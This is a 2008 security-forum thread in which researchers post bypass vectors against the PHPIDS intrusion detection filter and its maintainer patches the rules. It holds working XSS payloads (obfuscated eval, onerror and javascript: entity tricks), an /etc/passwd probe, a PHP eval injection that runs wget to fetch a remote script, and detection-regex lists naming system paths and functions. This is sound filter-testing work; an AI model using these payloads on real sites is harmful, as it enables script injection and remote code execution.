Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1516171819202122232425...LastNext
Current Page: 20 of 31
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 30, 2008 06:57AM

Most annoying one ever :)

do alert(1);while(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 30, 2008 08:50AM

Eeek - annoying indeed. and fixed. damn - i am surprised this still worked. do I have to say great find again or is this already implicitly included? ;)

Thanks!

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: May 30, 2008 10:58AM

two stage injection, with thanks to Gareth

code is:
switch('foo bar foo bar foo bar') {case eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array):}

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: May 30, 2008 11:49AM

@thornmaker

Nice! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: May 30, 2008 12:29PM

another variation, slightly shorter

code:
if(0){} else eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array)
'foo bar foo bar foo'

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: May 31, 2008 11:34PM

warning, this might DOS your browser. at least it does for me with firefox 3 beta. opera nicely lets you opt out of the alerts. it doesn't run in IE.

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 02, 2008 02:36AM

Hi, I wasn't online most of the weekend - so the fixes have been a little bit delayed. The last one is really weird - and i wasn't really sure how to categorize it. I added a new rule fragment to one of the DoS rules - hmmmmm.

Nice finds anyway - thx a lot ;)

Btw - I am currently in testing phase for the new html option - so you can use the PHPIDS in combination with WYSIWYG editors. I will set up a private demo during the next days - the public one will follow later. Anyone interested in the link please drop me a line!

The current roadmap:

0.4.8 - during the next days (rule fixes, converter fixes, more verbosity of the centrifuge)

0.5 - approximately in two or three weeks (same like above plus the html feature)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: June 02, 2008 04:02AM

I haven't tested them all individually, but at least onfocus alone will still get the job done.



Edited 1 time(s). Last edit at 06/02/2008 08:39AM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 02, 2008 05:04AM

@thornmaker

Nice1 again :)

@mario

Count me in of course!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: tx
Date: June 02, 2008 09:14PM

@.mario: link me, I wanna play ! :)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 03, 2008 03:08AM

@all: Will be done as soon as ready - I think I will have sth testable online around saturday.

@thornmaker: hmmmmm - kay. will take care of this asap!

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 06, 2008 07:05AM

The HTML demo is online - no extra link - just the normal demo with a checkbox. Have fun! (but don't expect wonders - it's the very first testing version ;) )

Example:
HTML allowed
HTML not allowed

HTML allowed (with vector)
HTML not allowed (with vector)

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 06, 2008 07:20AM

@mario

cool!

I'm confused though, how come this isn't allowed?
http://demo.php-ids.org/?test=%3Cimg+src%3D%22http%3A%2F%2Fwww.google.de%2F%22+%2F%3E&html=on

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 06, 2008 09:04AM

Could be a HTMLPurifier configuration issue - lemme check...

It's the missing alt attribute ;)

okay - found the issue and fixed it... i guess there are some more tricky tags with mandatory attributes etc.



Edited 2 time(s). Last edit at 06/06/2008 10:42AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 08, 2008 03:12AM

IE8 vector:-
http://demo.php-ids.org/?test=<img%20src=""%20onerror%0C=alert(1)%20alt=1>&html=on

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 06/08/2008 03:15AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 08, 2008 08:01AM

Ouch and thx - there was a problem in the _diff() method when handling data which was added by the HTMLPurifier. That issue is now fixed besides several other problems.

What still could work is hiding for example SQL injection attack vectors inside HTML attributes. Just pump the vector into the let's say alt tag and neither the PHPIDS nor the HTMLPurifier will notice/do something. I am working on that - but the issue is pretty complicated.

Example



Edited 1 time(s). Last edit at 06/08/2008 08:04AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 25, 2008 02:35PM

My javascript protocol fuzzer found some very interesting RTL chars in FF 2.0.0.14

Char: 56320, link: jav&#56320ascript:
Char: 56321, link: jav&#56321ascript:
Char: 56322, link: jav&#56322ascript:
Char: 56323, link: jav&#56323ascript:
Char: 56324, link: jav&#56324ascript:
Char: 56325, link: jav&#56325ascript:
,, ,, ,, ,,

All the way to:-
char: 57343, link: jav&#57343ascript:

These links can get passed the PHPIDS using different placement of the characters
e.g.
<a href="jav&#56325ascript:al&#56325ert(1)">test</a>

Or similar combination

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Matt Presson
Date: June 26, 2008 08:48AM

I couldn't get that to execute Gareth. Below is what I receive in return from my browser:

Access forbidden!

You don't have permission to access the requested object. It is either read-protected or not readable by the server.

If you think this is a server error, please contact the webmaster.
Error 403
localhost
06/26/08 08:44:33

The url in the address bar is: http://localhost/jav%EF%BF%BDascript:al%EF%BF%BDert(1)

Run on Apache 2.2.8 and accessed in FF3.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 26, 2008 10:07AM

@matt

FF 2.0.0.14 only I'm afraid :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Matt Presson
Date: June 26, 2008 01:22PM

AAAhhhhhh!

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 27, 2008 07:00AM

Hex entities also work if you use a semi-colon:-

From:
Char: 56320, link: jav&#xdc00;ascript:

To:
Char: 57343, link: jav&#xdfff;ascript:

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Posted by: Martin
Date: July 07, 2008 03:16AM

Heya,

Finally getting some time and resurrecting the .NETIDS, which was having severe memory consumption issues in its last build :/

Anyway, found a bug in one of the Regex expressions in convertFromJSCharcode:

if (preg_match_all('/\d*[+-\/\* ]\d+/', $char, $matches)) {

This should match optional digits, + or - or / or * or \s, and then digits.

It actually matches optional digits, anything in the ascii range + to / (because inside [] the - functions as a go between indicator), and then digits.

All that needs to be done is to escape the - as \-.

Hope that helps,

Martin

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Posted by: Anonymous User
Date: July 09, 2008 06:05PM

Hey Martin - sorry for taking so long to answer. You are right - that +- matches a range indeed. I will deploy the fix tomorrow first thing.

Thx & goods to see you here again ;)
.mario

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Posted by: SpoofGhost
Date: July 15, 2008 09:56AM

what about logfile poisoning? isn't this possible?

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Date: July 15, 2008 12:56PM

Might I suggest for some possible speed improvements and readability you use the character class 'xdigit' such as [:xdigit:] instead of [a-f0-9] and maybe replacing AND|OR|XOR|NAND|NOT with N?AND|X?OR|NOT

Also correct me if I am wrong can't [-\w\/\\\*] be written as [-\w/\\*]
I was aware you do not need to escape the characters since they are within the [ ] and only chars to escape are [ and ]. I haven't played around with this stuff for awhile so my memory could be off so don't take my word on this.

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Posted by: Anonymous User
Date: July 16, 2008 04:06PM

@SpoofGhost: What exactly do you mean?

@CM: Nup - unfortunately not - the stupid double escaping is a PHP issue on some versions. The N?AND issue on the other hand is definitely valid - will find its way into the 0.5.2. Thanks man!

Sorry for being pretty unresponsive lately - I can't access slackers from my workplace since our static IP gets banned over and over again... so I can only access the forum form @home - where I crashed pretty seldom the last weeks.

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Date: July 18, 2008 10:51PM

Did you look into the [:xdigit:] class?


(bin|home|conf|usr|etc|proc|opt|sbin|local|dev|tmp|kern|boot|root|sys|system|windows|winnt|program|

can be:

(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|


join|pop|push|reverse|shift|slice|splice|sort|unshift

can be:

join|pop|push|reverse|shift|sp?lice|sort|unshift


echo|print|print_r|var_dump|fopen|popen

can be:

echo|print|print_r|var_dump|[fp]open


(?:http|ftp|https)

can be:

(?:https?|ftp)


Those were all the simple ones I could find in my spare time which did not end up using parentheses which would slow the regex down.

Was the spaces that were added to (N?AND|X?OR|NOT ) intentional or a typo when doing search and replace?

Also (?:CONCAT|CHAR|CONCAT|LOAD_FILE|0x) you have CONCAT twice.

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Posted by: Anonymous User
Date: July 19, 2008 07:19AM

Hi,

all optimizations valid - just committed them into the trunk. Thanks a lot! And yes - the last two issues you mentioned were typos ;) Fixed.

Greetings and have a nice weekend,
.mario

Options: ReplyQuote
Re: PHPIDS (0.5 has landed)
Date: July 19, 2008 09:39AM

I noticed this in a lot of places you use:

[^:\s\w,.-\/?+]

did you mean it to be:

[^:\s\w,.\/?+-]

otherwise it will think its a char range from . to / which according to ASCII table is just those 2 chars, so the - is unneeded if it was meant to be a range or the - is being ignored if it was meant to be an included char.

Some other possible ones too:

[+&!-@]
[+-<>=]
[+-=\s]

Options: ReplyQuote
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: lpilorz
Date: July 29, 2008 12:10PM

http://demo.php-ids.org/?test=/etc/passwd
is taken as alphanumeric, so signature is not matched

hxxp://demo.php-ids.org/?test=skipcentrifuge {${`wget hxxp://example.com/x.php`}}
my favourite eval/preg_replace exploit


edit: removing second link, was broken by forum



Edited 2 time(s). Last edit at 07/29/2008 12:17PM by lpilorz.

Options: ReplyQuote
Pages: PreviousFirst...1516171819202122232425...LastNext
Current Page: 20 of 31


Sorry, only registered users may post in this forum.